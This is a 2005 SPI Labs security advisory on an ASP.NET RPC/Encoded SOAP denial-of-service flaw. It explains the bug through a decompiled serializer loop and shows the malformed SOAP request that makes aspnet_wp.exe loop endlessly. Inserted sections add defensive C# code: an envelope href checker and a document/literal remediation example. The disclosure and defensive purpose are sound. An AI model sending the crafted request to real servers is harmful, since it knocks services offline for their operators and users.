ASP.NET RPC/Encoded Web service DOS

From: SPI Labs (spilabs_at_spidynamics.com)
Date: 07/11/05

Date: Mon, 11 Jul 2005 17:01:45 -0400
To: <pen-test@securityfocus.com>, <bugtraq@securityfocus.com>, <vuln-dev@securityfocus.com>, <full-disclosure@lists.grok.org.uk>, <webappsec@securityfocus.com>

    ASP.NET RPC/Encoded Web service DOS
    http://www.spidynamics.com/spilabs/advisories/aspRCP.html

    Release Date: July 11, 2005
    Severity: High

    [System Affected]
    * IIS Servers exposing ASP.NET Web services that consume arrays in
    RPC/Encoded mode
    * Applications using System.Xml.Serialization to consume untrusted data
    in RPC/Encoded mode

    [Description]
    We have found that by sending a custom SOAP message to an RPC/Encoded
    web method which accepts an array (or any object derived from IList,
    like StringCollection or ArrayList), we can cause the aspnet_wp.exe
    process to consume 100% of the system resources. More than one request
    may be required to create this condition on faster systems.

    To replicate the issue, we can send a request to the Test(int[]
    someList) web method defined inside the AspCrashWebService project
    (refer to AspCrashWebService.zip distributed with this document). A
    normal SOAP message to call this method with a single element of 0 would
    look like:

    <?xml version="1.0" encoding="utf-16"?>
    <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"
    xmlns:tns="http://tempuri.org/"
    xmlns:types="http://tempuri.org/encodedTypes"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:xsd="http://www.w3.org/2001/XMLSchema">
      <soap:Body
    soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
        <tns:Test>
          <someList href="#id1" />
        </tns:Test>
        <soapenc:Array id="id1" soapenc:arrayType="xsd:int[1]">
          <Item>0</Item>
        </soapenc:Array>
      </soap:Body>
    </soap:Envelope>

    If we replace the <soapenc:Array> element with the complex type
    defined in our demo ASPCrashWebService.Service1 WSDL definition
    (ArrayOfInt), we will cause the problem in aspnet_wp.exe.
    Our new request would look like:

    <?xml version="1.0" encoding="utf-16"?>
    <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"
    xmlns:tns="http://tempuri.org/"
    xmlns:types="http://tempuri.org/encodedTypes"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:xsd="http://www.w3.org/2001/XMLSchema">
      <soap:Body
    soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
        <tns:Test>
          <someList href="#id1" />
        </tns:Test>
        <tns:ArrayOfInt>
          <Item>0</Item>
        </tns:ArrayOfInt>
      </soap:Body>
    </soap:Envelope>

    We have found that the error is caused by an infinite loop inside
    System.Xml.Serialization.Xml.XmlSerializationReader.ReadReferencedElements().
    The method can be translated to the following code:

            protected void ReadReferencedElements()
            {
                string V_0;

                // Skip whitespace and comments to the first multi-ref element.
                r.MoveToContent();
                // Keep reading until the reader reaches the end of soap:Body.
                while (r.NodeType != XmlNodeType.EndElement && r.NodeType != XmlNodeType.None)
                {
                    // Expected to consume one referenced element and advance
                    // the reader; for an unrecognised element it does not advance.
                    ReadReferencingElement(null, null, true, out V_0);
                    r.MoveToContent();
                }
                DoFixups();                   // bind href references to their ids
                HandleUnreferencedObjects();
            }

    The problem is that after the call to ReadReferencingElement()
    r.NodeType is left as XmlNodeType.Element, so the reader makes no
    progress and the while loop never terminates.
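    The loop above only spins when a multi-ref payload cannot be bound to the
    parameter that references it. The following added example (not code from
    the advisory or from the AspCrashWebService demo) inspects an
    RPC/encoded envelope before the framework deserializes it and reports
    every href that points at no id inside soap:Body, plus every trailing Body
    element that carries no id at all; the malformed request shown above has
    exactly that shape. The class name SoapRefChecker and the two embedded
    envelopes are constructed for this example; the idea is to call it from a
    SoapExtension or HttpModule ahead of XmlSerializer.

```csharp
using System;
using System.Collections.Generic;
using System.Xml;

// Added example, not the advisory's code. Flags RPC/encoded envelopes whose
// "href" attributes resolve to no "id" element under soap:Body.
public static class SoapRefChecker
{
    const string SoapEnvNs = "http://schemas.xmlsoap.org/soap/envelope/";

    // Returns one line per finding; an empty list means every href resolved
    // and every multi-ref payload element is addressable by id.
    public static List<string> FindUnresolvedRefs(string envelopeXml)
    {
        var findings = new List<string>();
        var doc = new XmlDocument();
        doc.XmlResolver = null;                     // never fetch DTDs or entities
        doc.LoadXml(envelopeXml);

        var ns = new XmlNamespaceManager(doc.NameTable);
        ns.AddNamespace("soap", SoapEnvNs);
        XmlNode body = doc.SelectSingleNode("/soap:Envelope/soap:Body", ns);
        if (body == null)
        {
            findings.Add("missing soap:Body");
            return findings;
        }

        // Every id declared anywhere under the Body is a legal href target.
        var ids = new HashSet<string>();
        foreach (XmlElement el in body.SelectNodes(".//*[@id]", ns))
            ids.Add(el.GetAttribute("id"));

        // An href must be a local fragment naming one of those ids.
        foreach (XmlElement el in body.SelectNodes(".//*[@href]", ns))
        {
            string href = el.GetAttribute("href");
            if (!href.StartsWith("#"))
                findings.Add("non-local href '" + href + "' on <" + el.Name + ">");
            else if (!ids.Contains(href.Substring(1)))
                findings.Add("unresolved href '" + href + "' on <" + el.Name + ">");
        }

        // Body children after the first (the call element) are multi-ref
        // payloads; one without an id can never be bound to a parameter.
        bool sawCall = false;
        foreach (XmlNode child in body.ChildNodes)
        {
            if (child.NodeType != XmlNodeType.Element) continue;
            if (!sawCall) { sawCall = true; continue; }
            if (!((XmlElement)child).HasAttribute("id"))
                findings.Add("trailing element <" + child.Name + "> has no id");
        }
        return findings;
    }

    // Constructed samples: the advisory's normal call and the malformed
    // variant, reduced to the soap:Body content that matters here.
    const string Normal =
        "<soap:Envelope xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'" +
        " xmlns:soapenc='http://schemas.xmlsoap.org/soap/encoding/'" +
        " xmlns:tns='http://tempuri.org/' xmlns:xsd='http://www.w3.org/2001/XMLSchema'>" +
        "<soap:Body><tns:Test><someList href='#id1'/></tns:Test>" +
        "<soapenc:Array id='id1' soapenc:arrayType='xsd:int[1]'><Item>0</Item></soapenc:Array>" +
        "</soap:Body></soap:Envelope>";

    const string Malformed =
        "<soap:Envelope xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'" +
        " xmlns:tns='http://tempuri.org/'>" +
        "<soap:Body><tns:Test><someList href='#id1'/></tns:Test>" +
        "<tns:ArrayOfInt><Item>0</Item></tns:ArrayOfInt>" +
        "</soap:Body></soap:Envelope>";

    public static void Main()
    {
        Console.WriteLine("normal: " + FindUnresolvedRefs(Normal).Count + " finding(s)");
        foreach (string f in FindUnresolvedRefs(Malformed))
            Console.WriteLine("malformed: " + f);
    }
}
```

    A request with any finding should be rejected with a SOAP fault before it
    reaches XmlSerializer; the check is cheap because it is one DOM pass over
    a body that the framework is about to parse anyway.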

    [Remediation]
    RPC/Encoded web services are not recommended by Microsoft. Developers
    should use document/literal instead, which is not affected by this
    issue. The Microsoft Security Response Center has stated that this issue
    will be addressed in the upcoming "Whidbey" release of Web Services. In
    the interim, the aspnet_wp.exe service can be restarted and operation
    will resume without problems.
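    In ASMX the encoding style is selected by attributes on the service
    class. The added example below (not the advisory's AspCrashWebService
    code; class names and the body of Test are hypothetical) shows the
    affected configuration next to the remediated one for the Test(int[]
    someList) method discussed above.

```csharp
using System.Web.Services;
using System.Web.Services.Description;
using System.Web.Services.Protocols;

// Added example, not code from the advisory or its demo project.

// Affected shape: [SoapRpcService] switches every WebMethod on the class to
// RPC/encoded, so the int[] parameter is read through the multi-ref path.
[WebService(Namespace = "http://tempuri.org/")]
[SoapRpcService]
public class Service1Rpc : WebService
{
    [WebMethod]
    public int Test(int[] someList)
    {
        return someList == null ? 0 : someList.Length;
    }
}

// Remediated shape: document/literal. ASMX already defaults to this when no
// Soap*Service attribute is present; stating it makes the intent reviewable.
[WebService(Namespace = "http://tempuri.org/")]
[SoapDocumentService(Use = SoapBindingUse.Literal)]
public class Service1Literal : WebService
{
    [WebMethod]
    public int Test(int[] someList)
    {
        return someList == null ? 0 : someList.Length;
    }
}
```

    When auditing a code base, search for the method-level [SoapRpcMethod]
    attribute as well as the class-level [SoapRpcService], since a single
    method can be switched to RPC/encoded even on a document/literal class.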

    [Credit]
    Discovery: Bryan Sullivan
    Research: Sacha Faust

    Contact Information
    spilabs@spidynamics.com
    SPI Dynamics, Inc.
    115 Perimeter Center Place N.E.
    Suite 1100
    Atlanta, GA 30346
    Toll-Free Phone: (866) 774-2700

    SPI Dynamics was founded in 2000 by a team of accomplished Web security
    specialists; SPI Dynamics is the leader in Web application security
    technology. With such signature products as WebInspect, SPI Dynamics is
    dedicated to protecting companies' most valuable assets. SPI Dynamics
    has created a new breed of Internet security products for the Web
    application, the most vulnerable yet least secure component of online
    business infrastructure.

    Copyright (c) 2005 SPI Dynamics, Inc. All rights reserved worldwide.

